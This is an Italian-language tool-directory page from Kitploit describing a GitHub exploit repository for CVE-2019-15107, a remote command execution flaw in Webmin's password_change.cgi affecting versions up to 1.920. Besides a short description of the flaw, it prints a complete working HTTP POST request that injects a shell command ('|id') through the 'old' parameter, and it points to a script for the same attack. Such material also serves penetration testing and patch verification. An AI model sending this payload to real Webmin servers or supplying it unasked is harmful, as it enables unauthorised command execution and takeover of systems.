Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WebminRCE-EXP-CVE-2019-15107- — Vulnerabilità di esecuzione remota di codice in Webmin | Kitploit
Strumenti/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

Vulnerabilità di esecuzione remota di codice in Webmin

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
3526 anni faNon ancora revisionato
Condividi

CVE-2019-15107: Moduli di Exploit Disponibili per la Vulnerabilità di Esecuzione Remota di Codice in Webmin

  1. Descrizione della vulnerabilità Webmin è un potente strumento di amministrazione di sistema basato sul Web, ampiamente utilizzato nei sistemi Unix. Durante l'elaborazione delle richieste in Password_Change.cgi di Webmin, il parametro 'old' presenta una vulnerabilità di injection di comandi che può essere sfruttata malevolmente. Quando l'utente abilita la funzione di reimpostazione della password di Webmin, un attaccante può sfruttare questa vulnerabilità per eseguire comandi arbitrari sul sistema vulnerabile e ottenere così una shell di sistema.

Versioni interessate: Webmin 1.920 e versioni precedenti

  1. Sfruttamento della vulnerabilità Metodo 1: Rilevamento manuale Accedi alla pagina, ignora il certificato e potrai vedere la pagina di login di Webmin step 1

Invia il seguente pacchetto dati per eseguire il comando id:

root@kitploit:~
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

step 2

Metodo 2: Utilizzo di uno script step 3

Scarica lo strumento